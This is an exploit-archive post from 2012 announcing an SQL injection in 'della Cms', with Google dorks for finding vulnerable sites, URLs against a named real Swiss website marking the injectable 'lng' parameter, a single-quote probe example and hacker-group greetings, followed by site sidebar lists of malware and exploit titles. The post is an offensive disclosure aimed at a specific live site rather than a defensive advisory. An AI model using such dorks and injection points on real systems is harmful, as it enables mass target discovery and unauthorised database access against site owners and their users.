Della CMS SQL Injection

Posted on 05 June 2012

-------------------- IN The NAme OF God --------------------

-====della Cms Sql Injection====-

# Exploit Title: della Cms Sql Injection
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# MAil : No0PM[at]yahoo[dot]com

-====Dork====-

inurl:index.php?node=

inurl:index.php?node=*&lng=*

-====Exploit====-

http://www.jbcbellinzona.ch/index.php?node=312&lng=1[Sqli]
http://www.jbcbellinzona.ch/index.php?node=312&lng=1[Sqli]&rif=f77134afcf

-====Example====-

http://www.jbcbellinzona.ch/index.php?node=312&lng=1%27

-====Tnx To====-

MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN

Yaghi_Vahshi - HELLBOY - IrIsT - Black_King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection
htmlLawed 1.2.5 Remote Command Execution
Online Tours And Travels Management System 1.0 SQL Injection

Last 20